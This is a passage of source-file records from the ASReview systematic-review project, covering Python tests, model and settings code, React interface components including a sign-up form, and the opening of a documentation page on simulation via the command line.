by_index=True).keywords is None\n assert as_data.record(2, by_index=True).keywords is None\n\n # Check missing doi\n assert as_data.record(0, by_index=True).doi is None\n assert as_data.record(2, by_index=True).doi is None\n\n\ndef test_write_data(tmpdir):\n fp_in = Path(\"tests\", \"demo_data\", \"generic_labels.csv\")\n fp_out = Path(tmpdir, \"generic_out.csv\")\n asr_data = ASReviewData.from_file(fp_in)\n asr_data.to_file(fp_out, labels=[[0, 0], [2, 1], [3, 1]])\n\n tmp_csv_fp_out = Path(tmpdir, \"tmp_generic_labels.csv\")\n asr_data.to_file(tmp_csv_fp_out)\n asr_data_diff = ASReviewData.from_file(tmp_csv_fp_out)\n # Check if 
export file includes labels [1,0]\n assert list(asr_data.labels) == list(asr_data_diff.labels)\n" }, { "alpha_fraction": 0.5589743852615356, "alphanum_fraction": 0.5675213932991028, "avg_line_length": 26, "blob_id": "f1a1c57b002888ea02e7d46e41250fc6d3e88cc4", "content_id": "016502468bb73c1a8e59f9687b1c2fcb9df16d75", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1755, "license_type": "permissive", "max_line_length": 80, "num_lines": 65, "path": "/asreview/webapp/src/HomeComponents/DashboardComponents/DashboardPageHeader.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport {\n Avatar,\n Box,\n IconButton,\n Stack,\n Tooltip,\n Typography,\n} from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\nimport { Upload } from \"@mui/icons-material\";\n\nimport { TypographyH5Medium } from \"../../StyledComponents/StyledTypography.js\";\n\nconst PREFIX = \"DashboardPageHeader\";\n\nconst classes = {\n headerButton: `${PREFIX}-header-button`,\n};\n\nconst Root = styled(\"div\")(({ theme }) => ({\n background: theme.palette.background.paper,\n [`& .${classes.headerButton}`]: {\n backgroundColor: [\n theme.palette.mode === \"dark\"\n ? theme.palette.grey[900]\n : theme.palette.grey[100],\n ],\n [theme.breakpoints.down(\"md\")]: {\n width: 24,\n height: 24,\n },\n },\n}));\n\nexport default function DashboardPageHeader(props) {\n return (\n <Root className=\"main-page-sticky-header-wrapper\">\n <Box className=\"main-page-sticky-header with-button\">\n {!props.mobileScreen && (\n <TypographyH5Medium>Projects dashboard</TypographyH5Medium>\n )}\n {props.mobileScreen && (\n <Typography variant=\"h6\">Projects dashboard</Typography>\n )}\n <Stack direction=\"row\" spacing={1}>\n <Tooltip title=\"Import project\">\n <IconButton\n disableRipple\n onClick={props.toggleImportDialog}\n size={!props.mobileScreen ? \"medium\" : \"small\"}\n >\n <Avatar className={classes.headerButton}>\n <Upload\n color=\"primary\"\n fontSize={!props.mobileScreen ? \"medium\" : \"small\"}\n />\n </Avatar>\n </IconButton>\n </Tooltip>\n </Stack>\n </Box>\n </Root>\n );\n}\n" }, { "alpha_fraction": 0.6463158130645752, "alphanum_fraction": 0.6522806882858276, "avg_line_length": 36.5, "blob_id": "496f213e9fb95aa069d0c383ab3554b094d1055a", "content_id": "a1da3746a02dbc73c473e5eccaba45c9eaa483a2", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2850, "license_type": "permissive", "max_line_length": 80, "num_lines": 76, "path": "/asreview/models/feature_extraction/tfidf.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\nfrom asreview.models.feature_extraction.base import BaseFeatureExtraction\n\n\nclass Tfidf(BaseFeatureExtraction):\n \"\"\"TF-IDF feature extraction technique (``tfidf``).\n\n Use the standard TF-IDF (Term Frequency-Inverse Document Frequency) feature\n extraction technique from `SKLearn <https://scikit-learn.org/stable/modules/\n generated/sklearn.feature_extraction.text.TfidfVectorizer.html>`__. Gives a\n sparse matrix as output. Works well in combination with\n :class:`asreview.models.classifiers.NaiveBayesClassifier` and other fast\n training models (given that the feature vectors are relatively wide).\n\n Arguments\n ---------\n ngram_max: int\n Can use ngrams up to ngram_max. For example, in the case of\n ngram_max=2, unigrams and bigrams could be used.\n stop_words: str\n When set to 'english', use stopwords. If set to None or 'none',\n do not use stop words.\n \"\"\"\n\n name = \"tfidf\"\n label = \"TF-IDF\"\n\n def __init__(self, *args, ngram_max=1, stop_words=\"english\", **kwargs):\n \"\"\"Initialize tfidf class.\"\"\"\n super(Tfidf, self).__init__(*args, **kwargs)\n self.ngram_max = ngram_max\n self.stop_words = stop_words\n if stop_words is None or stop_words.lower() == \"none\":\n sklearn_stop_words = None\n else:\n sklearn_stop_words = self.stop_words\n self._model = TfidfVectorizer(\n ngram_range=(1, ngram_max), stop_words=sklearn_stop_words\n )\n\n def fit(self, texts):\n self._model.fit(texts)\n\n def transform(self, texts):\n X = self._model.transform(texts).tocsr()\n return X\n\n def full_hyper_space(self):\n from hyperopt import hp\n\n hyper_space, hyper_choices = super(Tfidf, self).full_hyper_space()\n hyper_choices.update({\"fex_stop_words\": [\"english\", \"none\"]})\n hyper_space.update(\n {\n \"fex_ngram_max\": hp.uniformint(\"fex_ngram_max\", 1, 3),\n \"fex_stop_words\": hp.choice(\n \"fex_stop_words\", hyper_choices[\"fex_stop_words\"]\n ),\n }\n )\n return hyper_space, hyper_choices\n" }, { "alpha_fraction": 0.7554348111152649, "alphanum_fraction": 0.7554348111152649, "avg_line_length": 60.33333206176758, "blob_id": "f1ddc742a08ec03187760f2de581de478cc5f678", "content_id": "fbbde4bd98a48f5dbb255e24235f4bfe8b4aee6c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 736, "license_type": "permissive", "max_line_length": 75, "num_lines": 12, "path": "/asreview/webapp/src/ProjectComponents/SetupComponents/DataComponents/index.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "export { default as AddDataset } from \"./AddDataset\";\nexport { default as AddPriorKnowledge } from \"./AddPriorKnowledge\";\nexport { default as DataForm } from \"./DataForm\";\nexport { default as DataFormCard } from \"./DataFormCard\";\nexport { default as DatasetFromEntryPoint } from \"./DatasetFromEntryPoint\";\nexport { default as DatasetFromURL } from 
\"./DatasetFromURL\";\nexport { default as EnoughPriorBanner } from \"./EnoughPriorBanner\";\nexport { default as EntryPointDataset } from \"./EntryPointDataset\";\nexport { default as PriorLabeled } from \"./PriorLabeled\";\nexport { default as PriorRandom } from \"./PriorRandom\";\nexport { default as PriorSearch } from \"./PriorSearch\";\nexport { default as PriorUnlabeled } from \"./PriorUnlabeled\";\n" }, { "alpha_fraction": 0.5361050367355347, "alphanum_fraction": 0.5390226244926453, "avg_line_length": 26.420000076293945, "blob_id": "045849dfb509cd4f81206a65b5f8d6e46b18e324", "content_id": "41ccaaa13571ade4c7cf20a46d00604967622013", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1371, "license_type": "permissive", "max_line_length": 70, "num_lines": 50, "path": "/asreview/webapp/src/ProjectComponents/HistoryComponents/LabelChip.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { Chip, Stack } from \"@mui/material\";\n\nexport default function LabelChip(props) {\n const handleClickRelevant = () => {\n props.setLabel(\"relevant\");\n };\n\n const handleClickIrrelevant = () => {\n props.setLabel(\"irrelevant\");\n };\n\n const handleClickAll = () => {\n props.setLabel(\"all\");\n };\n\n return (\n <Stack direction=\"row\" spacing={2} sx={{ padding: \"8px 24px\" }}>\n <Chip\n label={\n !props.n_prior_inclusions\n ? \"Relevant\"\n : `Relevant (${props.n_prior_inclusions})`\n }\n color=\"primary\"\n variant={props.label === \"relevant\" ? \"filled\" : \"outlined\"}\n onClick={handleClickRelevant}\n size={!props.mobileScreen ? \"medium\" : \"small\"}\n />\n <Chip\n label={\n !props.n_prior_exclusions\n ? \"Irrelevant\"\n : `Irrelevant (${props.n_prior_exclusions})`\n }\n color=\"primary\"\n variant={props.label === \"irrelevant\" ? \"filled\" : \"outlined\"}\n onClick={handleClickIrrelevant}\n size={!props.mobileScreen ? \"medium\" : \"small\"}\n />\n <Chip\n label={\"All\"}\n color=\"primary\"\n variant={props.label === \"all\" ? \"filled\" : \"outlined\"}\n onClick={handleClickAll}\n size={!props.mobileScreen ? 
\"medium\" : \"small\"}\n />\n </Stack>\n );\n}\n" }, { "alpha_fraction": 0.4470854699611664, "alphanum_fraction": 0.45897001028060913, "avg_line_length": 25.97709846496582, "blob_id": "857bcad2769678efb2edf9e0d1c383e50b936d14", "content_id": "7af5ed7c11efcfb818bb778187911f3303d5ec2a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 3534, "license_type": "permissive", "max_line_length": 80, "num_lines": 131, "path": "/asreview/webapp/src/ProjectComponents/SetupComponents/DataComponents/DataFormCard.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport {\n Box,\n Button,\n Card,\n CardContent,\n Stack,\n Typography,\n} from \"@mui/material\";\nimport { Check } from \"@mui/icons-material\";\nimport { styled } from \"@mui/material/styles\";\n\nconst PREFIX = \"DataFormCard\";\n\nconst classes = {\n cardContent: `${PREFIX}-card-content`,\n cardOverlay: `${PREFIX}-card-overlay`,\n singleLine: `${PREFIX}-single-line`,\n};\n\nconst Root = styled(\"div\")(({ theme }) => ({\n [`& .${classes.cardContent}`]: {\n display: \"flex\",\n alignItems: \"center\",\n justifyContent: \"space-between\",\n padding: 24,\n paddingRight: 8,\n position: \"relative\",\n },\n\n [`& .${classes.cardOverlay}`]: {\n height: \"100%\",\n width: \"100%\",\n left: 0,\n pointerEvents: \"none\",\n position: \"absolute\",\n zIndex: 1,\n },\n\n [`& .${classes.singleLine}`]: {\n display: \"-webkit-box\",\n WebkitBoxOrient: \"vertical\",\n WebkitLineClamp: 2,\n whiteSpace: \"pre-line\",\n overflow: \"hidden\",\n },\n}));\n\nconst DataFormCard = (props) => {\n return (\n <Root>\n <Card\n elevation={0}\n sx={{\n bgcolor: (theme) =>\n theme.palette.mode === \"dark\" ? \"background.paper\" : \"grey.100\",\n }}\n >\n <CardContent className={classes.cardContent}>\n <Box\n className={classes.cardOverlay}\n sx={{\n bgcolor: (theme) => {\n if (props.datasetAdded !== undefined && !props.datasetAdded) {\n if (theme.palette.mode === \"dark\") {\n return \"rgba(40, 40, 40, 0.7)\";\n } else {\n return \"rgba(255, 255, 255, 0.5)\";\n }\n } else {\n return \"transparent\";\n }\n },\n }}\n />\n {!props.added && (\n <Stack spacing={1}>\n <Typography\n variant=\"subtitle1\"\n className={classes.singleLine}\n sx={{\n fontWeight: (theme) => theme.typography.fontWeightMedium,\n }}\n >\n {props.primaryDefault}\n </Typography>\n <Typography\n variant=\"body2\"\n className={classes.singleLine}\n sx={{ color: \"text.secondary\" }}\n >\n {props.secondaryDefault}\n </Typography>\n </Stack>\n )}\n {props.added && (\n <Stack spacing={1}>\n <Typography\n variant=\"subtitle1\"\n className={classes.singleLine}\n sx={{\n fontWeight: (theme) => theme.typography.fontWeightMedium,\n }}\n >\n {props.primaryAdded}\n </Typography>\n <Typography\n variant=\"body2\"\n className={classes.singleLine}\n sx={{ color: \"text.secondary\" }}\n >\n {props.secondaryAdded}\n </Typography>\n </Stack>\n )}\n <Stack direction=\"row\" sx={{ alignItems: \"center\" }}>\n {props.added && <Check color=\"success\" sx={{ mr: 1 }} />}\n <Button\n disabled={props.datasetAdded !== undefined && !props.datasetAdded}\n onClick={props.toggleAddCard}\n >\n {!props.added ? 
\"Add\" : \"Edit\"}\n </Button>\n </Stack>\n </CardContent>\n </Card>\n </Root>\n );\n};\n\nexport default DataFormCard;\n" }, { "alpha_fraction": 0.75, "alphanum_fraction": 0.8125, "avg_line_length": 15, "blob_id": "0eb81376f9f6b02ed62838a6e90005d37fde82d6", "content_id": "ddca4a6a3fe4c416df0150a8d1981ecc8d4b848c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 96, "license_type": "permissive", "max_line_length": 23, "num_lines": 6, "path": "/docs/requirements.txt", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "ipython\nsphinx==5.0.1\nsphinx_rtd_theme==1.0.0\nsphinx-reredirects\nsphinxcontrib-youtube\nnbsphinx\n" }, { "alpha_fraction": 0.7931034564971924, "alphanum_fraction": 0.7931034564971924, "avg_line_length": 18.66666603088379, "blob_id": "8fa18f2727690a7c18710dd9eb01a193d04695c1", "content_id": "aa05e2a056a3fe26b41dce441d1a74a5449802a2", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "TOML", "length_bytes": 58, "license_type": "permissive", "max_line_length": 30, "num_lines": 3, "path": "/asreview/webapp/tests/config/no_auth_config.toml", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "TESTING = true\nDEBUG = true\nAUTHENTICATION_ENABLED = false" }, { "alpha_fraction": 0.6661984920501709, "alphanum_fraction": 0.6722846627235413, "avg_line_length": 31.86153793334961, "blob_id": "2ece88b7f7db7c7a5658969dfad031f1b6f20115", "content_id": "3c7ec11b732b08a4c9ebe8fd263f90901ad2e09a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2136, "license_type": "permissive", "max_line_length": 79, "num_lines": 65, "path": "/asreview/models/query/base.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom abc import abstractmethod\n\nfrom asreview.models.base import BaseModel\n\n\nclass BaseQueryStrategy(BaseModel):\n \"\"\"Abstract class for query strategies.\"\"\"\n\n name = \"base-query\"\n\n @abstractmethod\n def query(self, X, classifier=None, n_instances=None, **kwargs):\n \"\"\"Query new instances.\n\n Arguments\n ---------\n X: numpy.ndarray\n Feature matrix to choose samples from.\n classifier: SKLearnModel\n Trained classifier to compute probabilities if they are necessary.\n n_instances: int\n Number of instances to query.\n\n Returns\n -------\n (numpy.ndarray, numpy.ndarray)\n The first is an array of shape (n_instances,) containing the row\n indices of the new instances in query order. 
The second is an array\n of shape (n_instances, n_feature_matrix_columns), containing the\n feature vectors of the new instances.\n \"\"\"\n raise NotImplementedError\n\n\nclass ProbaQueryStrategy(BaseQueryStrategy):\n name = \"proba\"\n\n def query(self, X, classifier, n_instances=None, **kwargs):\n \"\"\"Query method for strategies which use class probabilities.\"\"\"\n if n_instances is None:\n n_instances = X.shape[0]\n\n predictions = classifier.predict_proba(X)\n\n query_idx = self._query(predictions, n_instances, X)\n\n return query_idx\n\n @abstractmethod\n def _query(self, predictions, n_instances, X=None):\n raise NotImplementedError\n" }, { "alpha_fraction": 0.515561580657959, "alphanum_fraction": 0.5277401804924011, "avg_line_length": 25.39285659790039, "blob_id": "de706b6602141c762104a6e7d6f8fc3d44ffafb5", "content_id": "5be2c738f91d350277be8c63809de8fdc806059d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 739, "license_type": "permissive", "max_line_length": 74, "num_lines": 28, "path": "/asreview/webapp/src/ProjectComponents/SetupComponents/InfoCard.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { Box, Card, Typography } from \"@mui/material\";\nimport InfoOutlinedIcon from \"@mui/icons-material/InfoOutlined\";\n\nexport default function InfoCard(props) {\n return (\n <Card\n elevation={0}\n sx={{\n bgcolor: (theme) =>\n theme.palette.mode === \"dark\" ? \"background.paper\" : \"grey.100\",\n }}\n >\n <Box sx={{ display: \"flex\", alignItems: \"center\", p: 2 }}>\n <InfoOutlinedIcon\n fontSize=\"small\"\n sx={{ color: \"text.secondary\", mr: 1 }}\n />\n <Typography\n variant=\"body2\"\n sx={{ color: \"text.secondary\", fontSize: \"13px\" }}\n >\n {props.info}\n </Typography>\n </Box>\n </Card>\n );\n}\n" }, { "alpha_fraction": 0.5786980390548706, "alphanum_fraction": 0.5808374285697937, "avg_line_length": 32.55897521972656, "blob_id": "c32447be3411fd25d87a3bd1a37a8cee82fdd99c", "content_id": "047b2565baa790152b896ff7a84dda52cd463237", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6544, "license_type": "permissive", "max_line_length": 88, "num_lines": 195, "path": "/asreview/settings.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport logging\nimport os\nfrom configparser import ConfigParser\n\nfrom asreview.config import DEFAULT_N_INSTANCES\nfrom asreview.models.balance import get_balance_model\nfrom asreview.models.classifiers import get_classifier\nfrom asreview.models.feature_extraction import get_feature_model\nfrom asreview.models.query import get_query_model\nfrom asreview.types import type_n_queries\nfrom asreview.utils import pretty_format\n\nSETTINGS_TYPE_DICT = {\n \"model\": str,\n \"query_strategy\": str,\n \"balance_strategy\": str,\n \"feature_extraction\": str,\n \"n_instances\": int,\n \"stop_if\": type_n_queries,\n \"n_prior_included\": int,\n \"n_prior_excluded\": int,\n \"mode\": str,\n \"model_param\": dict,\n \"query_param\": dict,\n \"feature_param\": dict,\n \"balance_param\": dict,\n}\n\n\ndef _map_settings_type(name, value):\n if value is None:\n return None\n\n try:\n return SETTINGS_TYPE_DICT[name](value)\n except TypeError:\n raise TypeError(f\"Can't convert setting '{name}' to {SETTINGS_TYPE_DICT[name]}\")\n\n\ndef _convert_types(par_defaults, param):\n \"\"\"Convert strings from the config file to the appropriate type.\"\"\"\n for par in param:\n try:\n par_type = type(par_defaults[par])\n if par_type == bool:\n param[par] = param[par] in [\"True\", \"true\", \"T\", \"t\", True]\n else:\n try:\n param[par] = par_type(param[par])\n except TypeError:\n raise TypeError(f\"Error converting key in config file: {par}\")\n except KeyError:\n logging.warning(\n f\"Parameter {par} does not have a default.\\n\"\n f\"Defaults: {par_defaults}.\"\n )\n\n\nclass ASReviewSettings(object):\n \"\"\"Object to store the configuration of a review session.\n\n It differs from a plain settings dictionary in that it type\n checks (some) of its contents.\n \"\"\"\n\n def __init__(\n self,\n model,\n query_strategy,\n balance_strategy,\n feature_extraction,\n n_instances=DEFAULT_N_INSTANCES,\n stop_if=None,\n n_prior_included=None,\n n_prior_excluded=None,\n as_data=None,\n model_param={},\n query_param={},\n balance_param={},\n feature_param={},\n data_fp=None,\n n_queries=None,\n abstract_only=False, # deprecated\n mode=None, # deprecated\n n_papers=None, # deprecated\n data_name=None, # deprecated\n ):\n self.model = model\n self.query_strategy = query_strategy\n self.balance_strategy = balance_strategy\n self.feature_extraction = feature_extraction\n self.n_instances = n_instances\n self.stop_if = stop_if\n self.n_prior_included = n_prior_included\n self.n_prior_excluded = n_prior_excluded\n self.as_data = as_data\n self.model_param = model_param\n if query_strategy == \"max_random\":\n query_param_copy = query_param.copy()\n try:\n del query_param_copy[\"strategy_1\"]\n del query_param_copy[\"strategy_2\"]\n except KeyError:\n pass\n self.query_param = query_param_copy\n else:\n self.query_param = query_param\n self.balance_param = balance_param\n self.feature_param = feature_param\n\n def __str__(self):\n return pretty_format(self.to_dict())\n\n def 
__setattr__(self, name, value):\n try:\n super(ASReviewSettings, self).__setattr__(\n name, _map_settings_type(name, value)\n )\n except KeyError:\n super(ASReviewSettings, self).__setattr__(name, value)\n\n def to_dict(self):\n \"\"\"Export default settings to dict.\"\"\"\n info_dict = {}\n for attrib in SETTINGS_TYPE_DICT:\n value = getattr(self, attrib, None)\n if value is not None:\n info_dict[attrib] = value\n return info_dict\n\n def from_file(self, config_file):\n \"\"\"Fill the contents of settings by reading a config file.\n\n Arguments\n ---------\n config_file: str\n Source configuration file.\n\n \"\"\"\n if config_file is None or not os.path.isfile(config_file):\n if config_file is not None:\n print(f\"Didn't find configuration file: {config_file}\")\n return\n\n config = ConfigParser()\n config.optionxform = str\n config.read(config_file)\n\n # Read each of the sections.\n for sect in config:\n if sect == \"global_settings\":\n for key, value in config.items(sect):\n try:\n setattr(self, key, SETTINGS_TYPE_DICT[key](value))\n except (KeyError, TypeError):\n print(\n f\"Warning: value with key '{key}' is ignored \"\n \"(spelling mistake, wrong type?).\"\n )\n\n elif sect in [\n \"model_param\",\n \"query_param\",\n \"balance_param\",\n \"feature_param\",\n ]:\n setattr(self, sect, dict(config.items(sect)))\n elif sect != \"DEFAULT\":\n print(\n f\"Warning: section [{sect}] is ignored in \"\n f\"config file {config_file}\"\n )\n\n model = get_classifier(self.model)\n _convert_types(model.default_param, self.model_param)\n balance_model = get_balance_model(self.balance_strategy)\n _convert_types(balance_model.default_param, self.balance_param)\n query_model = get_query_model(self.query_strategy)\n _convert_types(query_model.default_param, self.query_param)\n feature_model = get_feature_model(self.feature_extraction)\n _convert_types(feature_model.default_param, self.feature_param)\n" }, { "alpha_fraction": 0.4470854699611664, "alphanum_fraction": 0.45897001028060913, "avg_line_length": 31.16428565979004, "blob_id": "3059e935e15a39d4f42854d0d69848a651ae6101", "content_id": "b79e732ceb4b32f5f297a829d3b7158df2c4ee81", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 9006, "license_type": "permissive", "max_line_length": 96, "num_lines": 280, "path": "/asreview/webapp/src/Components/SignUpForm.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import React from \"react\";\nimport { useNavigate } from \"react-router-dom\";\nimport { useMutation } from \"react-query\";\nimport LoadingButton from \"@mui/lab/LoadingButton\";\nimport {\n Box,\n Button,\n Card,\n CardContent,\n Checkbox,\n Fade,\n FormControl,\n FormControlLabel,\n FormHelperText as FHT,\n Stack,\n TextField,\n Typography,\n} from \"@mui/material\";\n\nimport { InlineErrorHandler } from \".\";\nimport { WordmarkState } from \"../globals\";\nimport { styled } from \"@mui/material/styles\";\nimport { HelpPrivacyTermsButton } from \"../Components\";\nimport { useToggle } from \"../hooks/useToggle\";\nimport BaseAPI from \"../api/AuthAPI\";\nimport { useFormik } from \"formik\";\nimport * as Yup from \"yup\";\n\nconst PREFIX = \"SignUpForm\";\n\nconst classes = {\n button: `${PREFIX}-button`,\n card: `${PREFIX}-card`,\n cardContent: `${PREFIX}-card-content`,\n logo: `${PREFIX}-logo`,\n};\n\nconst Root = styled(\"div\")(({ theme }) => ({\n display: \"flex\",\n height: \"100%\",\n width: \"100%\",\n alignItems: \"center\",\n 
justifyContent: \"center\",\n position: \"absolute\",\n [`& .${classes.button}`]: {\n paddingTop: theme.spacing(3),\n paddingBottom: theme.spacing(3),\n justifyContent: \"space-between\",\n },\n\n [`& .${classes.card}`]: {\n borderRadius: theme.spacing(2),\n width: \"500px\",\n },\n\n [`& .${classes.cardContent}`]: {\n padding: \"48px 40px !important\",\n },\n\n [`& .${classes.logo}`]: {\n width: \"100%\",\n maxWidth: \"130px\",\n },\n}));\n\n// VALIDATION SCHEMA\nconst SignupSchema = Yup.object().shape({\n email: Yup.string().email(\"Invalid email\").required(\"Email is required\"),\n name: Yup.string().required(\"Full name is required\"),\n affiliation: Yup.string()\n .min(2, \"Affiliation must be at least 2 characters long\")\n .required(\"Affiliation is required\"),\n password: Yup.string()\n .matches(\n /^(?=.*[A-Za-z])(?=.*\\d)(?=.*[@$!%*?&#])[A-Za-z\\d@$!%*?&#]{8,}$/,\n \"Use 8 or more characters with a mix of letters, numbers & symbols\",\n )\n .required(\"Password is required\"),\n confirmPassword: Yup.string()\n .required(\"Password confirmation is required\")\n .oneOf([Yup.ref(\"password\"), null], \"Passwords must match\"),\n});\n\nconst SignUpForm = (props) => {\n // Pass the useFormik() hook initial form values, a validate function that will be called when\n // form values change or fields are blurred, and a submit function that will\n // be called when the form is submitted\n const navigate = useNavigate();\n\n const [showPassword, toggleShowPassword] = useToggle();\n\n const returnType = () => {\n return !showPassword ? \"password\" : \"text\";\n };\n\n const initialValues = {\n email: \"\",\n name: \"\",\n affiliation: \"\",\n password: \"\",\n confirmPassword: \"\",\n publicAccount: true,\n };\n\n const formik = useFormik({\n initialValues: initialValues,\n validationSchema: SignupSchema,\n });\n\n const { error, isError, mutate } = useMutation(BaseAPI.signup, {\n onSuccess: () => {\n formik.setValues(initialValues, false);\n navigate(\"/signin\");\n },\n });\n\n const handleSubmit = () => {\n mutate(formik.values);\n };\n\n const handleSignIn = () => {\n navigate(\"/signin\");\n };\n\n const handleEnterKey = (e) => {\n if (e.keyCode === 13) {\n handleSubmit(e);\n }\n };\n\n return (\n <Root>\n <Fade in>\n <Box>\n <Card className={classes.card} variant=\"outlined\">\n <CardContent className={classes.cardContent}>\n <Stack spacing={3}>\n <img\n className={classes.logo}\n src={WordmarkState()}\n alt=\"ASReview LAB\"\n />\n <Typography variant=\"h5\">Create your profile</Typography>\n <Stack\n spacing={3}\n component=\"form\"\n noValidate\n autoComplete=\"off\"\n >\n <TextField\n id=\"email\"\n label=\"Email\"\n size=\"small\"\n fullWidth\n value={formik.values.email}\n onChange={formik.handleChange}\n onBlur={formik.handleBlur}\n />\n {formik.touched.email && formik.errors.email ? (\n <FHT error={true}>{formik.errors.email}</FHT>\n ) : null}\n <TextField\n id=\"name\"\n label=\"Full name\"\n size=\"small\"\n fullWidth\n value={formik.values.name}\n onChange={formik.handleChange}\n onBlur={formik.handleBlur}\n />\n {formik.touched.name && formik.errors.name ? (\n <FHT error={true}>{formik.errors.name}</FHT>\n ) : null}\n <TextField\n id=\"affiliation\"\n label=\"Affiliation\"\n size=\"small\"\n fullWidth\n value={formik.values.affiliation}\n onChange={formik.handleChange}\n onBlur={formik.handleBlur}\n />\n {formik.touched.affiliation && formik.errors.affiliation ? 
(\n <FHT error={true}>{formik.errors.affiliation}</FHT>\n ) : null}\n <FormControl>\n <Stack direction=\"row\" spacing={2}>\n <TextField\n id=\"password\"\n label=\"Password\"\n size=\"small\"\n fullWidth\n type={returnType()}\n value={formik.values.password}\n onChange={formik.handleChange}\n onBlur={formik.handleBlur}\n />\n <TextField\n id=\"confirmPassword\"\n label=\"Confirm Password\"\n size=\"small\"\n fullWidth\n type={returnType()}\n onKeyDown={handleEnterKey}\n value={formik.values.confirmPassword}\n onChange={formik.handleChange}\n onBlur={formik.handleBlur}\n />\n </Stack>\n </FormControl>\n {formik.touched.password && formik.errors.password ? (\n <FHT error={true}>{formik.errors.password}</FHT>\n ) : null}\n {formik.touched.confirmPassword &&\n formik.errors.confirmPassword ? (\n <FHT error={true}>{formik.errors.confirmPassword}</FHT>\n ) : null}\n <FormControl>\n <FormControlLabel\n control={\n <Checkbox\n id=\"public\"\n color=\"primary\"\n onChange={toggleShowPassword}\n />\n }\n label=\"Show password\"\n />\n {false && (\n <>\n <FormControlLabel\n control={\n <Checkbox\n color=\"primary\"\n id=\"publicAccount\"\n defaultChecked={formik.values.publicAccount}\n value={formik.values.publicAccount}\n onChange={formik.handleChange}\n onBlur={formik.handleBlur}\n />\n }\n label=\"Make this account public\"\n />\n <FHT>\n Making this account public allows you to collaborate.\n </FHT>\n </>\n )}\n </FormControl>\n {isError && <InlineErrorHandler message={error.message} />}\n\n <Stack className={classes.button} direction=\"row\">\n <Button\n onClick={handleSignIn}\n sx={{ textTransform: \"none\" }}\n >\n Sign In instead\n </Button>\n <LoadingButton\n //loading={isLoading}\n variant=\"contained\"\n color=\"primary\"\n onClick={handleSubmit}\n disabled={!(formik.isValid && formik.dirty)}\n >\n Create\n </LoadingButton>\n </Stack>\n </Stack>\n </Stack>\n </CardContent>\n </Card>\n <HelpPrivacyTermsButton />\n </Box>\n </Fade>\n </Root>\n );\n};\n\nexport default SignUpForm;\n" }, { "alpha_fraction": 0.7007912397384644, "alphanum_fraction": 0.7091878056526184, "avg_line_length": 30.27777862548828, "blob_id": "4f2d93d91d07d80781d36d34a44b1d2e69ecd5dd", "content_id": "81d130b02257c5f87cdfed639eeeea92f3fb9bd9", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 6295, "license_type": "permissive", "max_line_length": 110, "num_lines": 198, "path": "/docs/source/simulation_cli.rst", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "Simulation via command line\n===========================\n\nASReview LAB comes with a command line interface for simulating the\nperformance of the ASReview algorithm.\n\n.. _simulation-cli-getting-started:\n\nGetting started\n---------------\n\nThe simulation command line tool can be accessed directly like this:\n\n.. code-block:: 